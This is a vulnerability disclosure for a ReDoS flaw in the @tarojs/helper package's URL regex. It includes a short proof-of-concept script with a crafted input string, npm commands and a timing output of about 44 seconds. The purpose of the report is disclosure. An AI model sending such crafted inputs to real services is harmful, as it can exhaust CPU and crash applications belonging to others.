✍️ Description

A ReDoS (regular expression denial of service) flaw was found in the @tarojs/helper package. An attacker that is able to provide crafted input as url may cause an application to consume an excessive amount of CPU.

🕵️‍♂️ Proof of Concept

Create the following poc.mjs

// PoC.mjs

import pkg from '@tarojs/helper';
const {REG_URL} = pkg;
var time = Date.now();
REG_URL.test('http://foobar.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.');
var time_cost = Date.now() - time;
console.log("Time taken to validate : " + time_cost+" ms")

Execute the following command in another terminal:

npm i @tarojs/helper
node poc.js

Check the Output:

Time taken to validate : 44880 ms

💥 Impact

This vulnerability is capable of exhausting system resources and leads to crashes. Ideally, validation should be done within 1-10 milliseconds, but in the above case, it’s 44 seconds.